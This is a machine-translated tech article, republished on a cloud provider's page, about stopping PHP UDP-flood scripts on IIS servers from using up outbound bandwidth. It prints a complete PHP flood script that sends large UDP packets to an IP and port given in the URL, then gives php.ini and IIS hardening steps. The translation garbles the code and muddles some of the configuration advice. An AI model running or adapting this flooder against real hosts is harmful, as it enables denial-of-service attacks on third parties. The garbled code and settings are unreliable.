How does iis prevent php ddos from occupying network bandwidth and server resources?

Source: Internet
Author: User

Use PHP code to call sockets and directly use the server's network to attack other IP addresses. Previously I encountered this problem in apache, today we will talk about how to prevent php ddos attacks from occupying the network bandwidth and server resources in iis.

Common php ddos code is as follows:

The Code is as follows: Copy code

$ Packets = 0;
$ Ip = $ _ GET ['IP'];
$ Rand = $ _ GET ['Port'];
Set_time_limit (0 );
Ignore_user_abort (FALSE );

$ Exec_time = $ _ GET ['time'];

$ Time = time ();
Print "Flooded: $ ip on port $ rand

";
$ Max_time = $ time + $ exec_time;


For ($ I = 0; I I <65535; $ I ++ ){
$ Out. = "X ";
}
While (1 ){
$ Packets ++;
If (time ()> $ max_time ){
Break;
}

$ Fp = fsockopen ("udp: // $ ip", $ rand, $ errno, $ errstr, 5 );
If ($ fp ){
Fwrite ($ fp, $ out );
Fclose ($ fp );
}
}
Echo "Packet complete ". time ('H: I: s '). "with $ packets (". round ($ packets * 65)/1024, 2 ). "mB) packets averaging ". round ($ packets/$ exec_time, 2 ). "packets/s n ";
?>

Characteristics:

When IIS is enabled, the outbound bandwidth of the server is used up. That is to say, the server continuously sends packets to others. This is different from the DDOS attack. DDOS constantly receives a large number of packets.

Solution:

Set the value to Off in c: windowsphp. ini.

The Code is as follows: Copy code

Allow_url_fopen = Off

And:

The Code is as follows: Copy code

; Extension = php_sockets.dll

The preceding; number must be available, which means to restrict the use of sockets. dll

Then:

The Code is as follows: Copy code

; Ignore_user_abort = On

Remove the previous; number

Then restart IIS

If the above method still does not work, you can disable PHP extension testing in the extensions allowed in IIS.

NOTE: If your server does not need a running mechanism, php can be disabled. If necessary, you can disable php_sockets.dll. Another way is to block all udp ports, you only need to open some important ports such as 80.


Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.